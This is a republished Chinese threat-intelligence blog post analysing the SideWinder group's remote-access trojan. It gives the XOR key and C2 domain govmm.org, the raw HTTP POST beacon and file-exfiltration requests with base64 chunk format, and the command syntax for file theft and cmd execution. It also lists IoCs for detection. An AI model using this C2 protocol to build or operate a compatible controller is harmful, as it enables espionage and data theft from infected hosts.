2026-01-01 05:06:07 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： 本文分析了SideWinder组织远控木马的通信机制，样本利用WinHttp连接C2并采用异或加密隐藏域名。木马通过POST请求交互，支持执行任意命令及窃取文件，数据经Base64编码传输。作者复现了攻击流程并提供了关键IoC，建议加强对该组织特征流量的监控。 综合评分： 85 文章分类： 恶意软件,威胁情报

cover_image

APT | SideWinder组织远控木马加密通信分析

原创

Tahir

TahirSec

2025年12月31日 19:30 北京

概述

响尾蛇组织，又称Sidewinder、APT-C-17、T-APT-04，是一个来自于南亚地区的境外APT组织。该组织主要针对中国、巴基斯坦、尼泊尔、斯里兰卡等亚洲地区国家进行网络间谍活动，主要针对高校，新闻，金融，媒体，政府和电信公司进行攻击，以窃取敏感信息为主要目标。该组织的相关攻击活动最早可以追溯到2012年，至今还非常活跃，大多数行动是对巴基斯坦进行攻击，窃取机密信息。

SideWinder组织远控木马利用WinHttp模块外连C2域名govmm.org实现任意命令执行和文件窃取。

下面详细分析样本，复现SideWinder远控木马命令控制交互的整个过程。

样本分析

| | | | | | | | — | — | — | — | — | — | | 文件名 | 功能 | 文件大小bytes | 编译时间 | md5 | IoC | | manarupdate.exe | SideWinder组织远控木马 | 402432 | 2025-06-06 19:11:03 | 7a6723cea87ba7c098f022ad92abf865 | govmm.org |

提取数据节加密字符串CE 4*k; *异或得到C2域名govmm.org。

异或密钥：

$*VYGETRMPHG@%9bvdsf984574398546573d6#^%*&

获取用户Temp目录，temp目录与TMP987979RND拼接得到完整文件路径。

C:\Users\<username>\AppData\Local\Temp\TMP987979RND

生成随机值作为ClientID标识受害者主机，并写入临时文件。

ClientID与字符串拼接得到完整uri。

/softwareapp-updates/2092504164/serveupdate.php?updateapps=78778JvGFDTS879843

利用WinHttp API函数，发送HTTP POST请求连接C2服务器。

以POST方式发送上线包。

POST&nbsp;/softwareapp-updates/2092504164/serveupdate.php?updateapps=78778JvGFDTS879843 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0&nbsp;(Windows NT&nbsp;10.0; Win64; x64) AppleWebKit/537.38&nbsp;(KHTML, like Gecko) Chrome/103.0.4577.82&nbsp;Safari/530.11Content-Length:&nbsp;0Host: govmm.org

远控木马读取C2服务器返回的数据，进行参数解析，下载文件的命令格式如下：

GOTCHAA=download <filepath>

远控木马解析download参数，得到完整文件路径并访问文件获取内容。

将文件内容进行base64编码。

Base64编码后的数据拼接到chunkvalue参数，返回包数据格式如下：

updateoutput=totsize=1---chunkno=1---chunkvalue=base64(content)
totsize为数据分片的总个数chunkno为当前数据分片的序号chunkvalue为base64编码后的文件内容

发送数据到C2服务器。

POST&nbsp;/softwareapp-updates/2092504164/serveupdate.php?updateapps=78778JvGFDTS879843 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0&nbsp;(Windows NT&nbsp;10.0; Win64; x64) AppleWebKit/537.38&nbsp;(KHTML, like Gecko) Chrome/103.0.4577.82&nbsp;Safari/530.11Content-Length:&nbsp;68Host: govmm.org&nbsp;updateoutput=totsize=1---chunkno=1---chunkvalue=DQoxMjM0NTY3ODkNCg==

若控制命令不等于download，则将硬编码的加密字符串异或解密得到cmd字符串。

拼接C2服务器传入的字符串，得到完整命令，调用CreateProcess启动CMD执行命令。

利用pipe管道获取命令回显，回显经过base64编码后拼接到updateoutput参数发送至C2服务器。

根据上述分析，实现远控木马服务端，复现SideWinder组织远控木马，执行任意命令、下载任意文件过程。

执行dir命令：

执行文件下载命令：

IoC

govmm.org

7a6723cea87ba7c098f022ad92abf865

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：TahirSec Tahir《APT | SideWinder组织远控木马加密通信分析》